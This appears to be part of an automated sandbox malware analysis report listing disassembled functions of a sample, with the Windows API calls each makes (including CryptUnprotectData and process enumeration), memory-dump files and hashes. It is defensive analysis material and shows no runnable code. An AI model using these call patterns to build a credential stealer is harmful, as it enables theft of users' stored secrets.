                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: 8069e625b462a9cf396274496d01e986403099bb2599fadd2a9f5e510e5cdc85
                            • Instruction ID: 5f1e300fcb816557ec2b0f5facd4a090da5bd3a22e6cc38328ad28cddcb362dd
                            • Opcode Fuzzy Hash: 8069e625b462a9cf396274496d01e986403099bb2599fadd2a9f5e510e5cdc85
                            • Instruction Fuzzy Hash: 2A21D8B5D0420CABCB04EFE4D9459EEB7B9FF48300F04852EE506A3250EB755609DB69
                            Function 000E7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 000E724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E7254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000E7281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000E72A4
                            • LocalFree.KERNEL32(?), ref: 000E72AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: c68d08993497232b8461d646adeabf6353bdc23c5a08fc083ee49453d7cda449
                            • Instruction ID: ddb39470c8f03823e8b255ea46108ae09eee035019bf486fce8f8e81e9b6597f
                            • Opcode Fuzzy Hash: c68d08993497232b8461d646adeabf6353bdc23c5a08fc083ee49453d7cda449
                            • Instruction Fuzzy Hash: 99011275A40208BBDB25DFD4DD46F9D77B8EB44B00F104159FB05BB2C0D7B0AA018B65
                            Function 000F9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000F961E
                            • Process32First.KERNEL32(00100ACA,00000128), ref: 000F9632
                            • Process32Next.KERNEL32(00100ACA,00000128), ref: 000F9647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 000F965C
                            • CloseHandle.KERNEL32(00100ACA), ref: 000F967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 0d98b481103cd2925a62239496570fb406f84e42aca5b0d7c098646affc8fde1
                            • Instruction ID: 23a11a9dbada796033dc08dba85ac09ddfc0b0e6e86597b0dcaab72129d457b0
                            • Opcode Fuzzy Hash: 0d98b481103cd2925a62239496570fb406f84e42aca5b0d7c098646affc8fde1
                            • Instruction Fuzzy Hash: FA011E75A00208EBCB25DFA5CD48BEDBBF8EF48300F104198AA05D7240DB349B45DF51
                            Function 004B2C63 Relevance: 6.6, Strings: 4, Instructions: 1630COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2sS$'1|$nZG.$a~
                            • API String ID: 0-3995872047
                            • Opcode ID: c7f8866d651412dad627f9389208db83560e2ac6f0d72f56bc0fcacb8b74aeae
                            • Instruction ID: fdb7843c86c5abf8529fc9d67a31085e3a80564831e70929a27b6e2225ca46e7
                            • Opcode Fuzzy Hash: c7f8866d651412dad627f9389208db83560e2ac6f0d72f56bc0fcacb8b74aeae
                            • Instruction Fuzzy Hash: 6FB203F360C2049FE304AE2DEC4567AFBE5EFD4720F16893DEAC483744EA3598458686
                            Function 004AA4BD Relevance: 6.6, Strings: 4, Instructions: 1625COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "bO}$`X|$l?l}$wJ~i
                            • API String ID: 0-1620876229
                            • Opcode ID: 31f475fd26e3a1afd9ec5fa8925e0f9f1e172db9565181f695932731e4dada61
                            • Instruction ID: e962fe8c51b199fb31f44733db31583e03626e50a8661c16217e918408d1a40d
                            • Opcode Fuzzy Hash: 31f475fd26e3a1afd9ec5fa8925e0f9f1e172db9565181f695932731e4dada61
                            • Instruction Fuzzy Hash: 1CB215F3A0C2049FE304AE2DEC8567ABBE9EF94720F1A493DE6C5C7344E67558018697
                            Function 004B1170 Relevance: 6.6, Strings: 4, Instructions: 1601COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: dP{}$p*a[$zLo$Ny
                            • API String ID: 0-400026672
                            • Opcode ID: a48e2afc372df8e4ba7e2ca69a29105c78971a64a5231a9413d50bd185de70f0
                            • Instruction ID: 3025cf9bb35a11544e02c20dd887364655f772f06b637d9f79d2ed2142ddf95d
                            • Opcode Fuzzy Hash: a48e2afc372df8e4ba7e2ca69a29105c78971a64a5231a9413d50bd185de70f0
                            • Instruction Fuzzy Hash: 9BB219F360C204AFE704AE29EC8567AFBE5EFD4320F1A493DEAC487744E63558058697
                            Function 000F8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,000E5184,40000001,00000000,00000000,?,000E5184), ref: 000F8EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 5fc25ee663b2fa0d0808959a073eb8656d0a2be7368b243076521df366c1b6f6
                            • Instruction ID: 5b5957eeebb51f417393f30556a066c90082d8cab25722fadd468eeab010bdcd
                            • Opcode Fuzzy Hash: 5fc25ee663b2fa0d0808959a073eb8656d0a2be7368b243076521df366c1b6f6
                            • Instruction Fuzzy Hash: 93111570200608BFDB54CF64E885FBB37AAAF89700F10D458FA198B650DB75EC46EB60
                            Function 000E9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000E4EEE,00000000,00000000), ref: 000E9AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,000E4EEE,00000000,?), ref: 000E9B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,000E4EEE,00000000,00000000), ref: 000E9B2A
                            • LocalFree.KERNEL32(?,?,?,?,000E4EEE,00000000,?), ref: 000E9B3F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: 4f0499ba7b0c502385354ab63746f132ce07f483c4cc044e8c4d0c56746352c9
                            • Instruction ID: 6ad2fbebf4b4d40bfb6920e31b6325e44d546f3428ea4066fbc060f82665ca77
                            • Opcode Fuzzy Hash: 4f0499ba7b0c502385354ab63746f132ce07f483c4cc044e8c4d0c56746352c9
                            • Instruction Fuzzy Hash: 7111A4B4240208BFEB11CF64DC95FAA77B9FB89700F208058FA159B390C775A941CB50
                            Function 000F7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0122DFF0,00000000,?,00100E10,00000000,?,00000000,00000000), ref: 000F7A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F7A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0122DFF0,00000000,?,00100E10,00000000,?,00000000,00000000,?), ref: 000F7A7D
                            • wsprintfA.USER32 ref: 000F7AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: f18487ed7a56627724967e2e348d795991a913858cc7f8931e3935bc6d3e7d24
                            • Instruction ID: 7001751184b8c8bd05c5ab253ef5089b21e6e4dc2153088c3ea5cceeae4e615a
                            • Opcode Fuzzy Hash: f18487ed7a56627724967e2e348d795991a913858cc7f8931e3935bc6d3e7d24
                            • Instruction Fuzzy Hash: BD1182B1945618DBDB218F54DC45F69BBBCF744711F10439AE60A932C0D7741A41DF52
                            Function 000F3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(000FE118,00000000,00000001,000FE108,00000000), ref: 000F3758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 000F37B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 3aa6dff0154b367247d16ee9dc58da6bcebaf4dff26f5462d4a534203eaf2446
                            • Instruction ID: 567a9518aa44294b9b1bfbb9001d3a30ced58f3d9f36b35a0f27906d8f33f1e6
                            • Opcode Fuzzy Hash: 3aa6dff0154b367247d16ee9dc58da6bcebaf4dff26f5462d4a534203eaf2446
                            • Instruction Fuzzy Hash: 9141E770A40A2C9FDB24DB58CC95BABB7B5BB48702F4041D8E608AB290D7716E86CF50
                            Function 000E9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000E9B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 000E9BA3
                            • LocalFree.KERNEL32(?), ref: 000E9BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 18a997318f4aa09238ca0263f0000f1b00bdd77508328966729a299d873c7322
                            • Instruction ID: d11d2801c4b53ef43f5524318be874d0aa0d9c6dd1a9fef41de63c13316b7776
                            • Opcode Fuzzy Hash: 18a997318f4aa09238ca0263f0000f1b00bdd77508328966729a299d873c7322
                            • Instruction Fuzzy Hash: 7511C9B8A00209EFDB05DF98D985AAEB7F9FF88300F104598E915A7350D774AE51CFA1
                            Function 0041738D Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
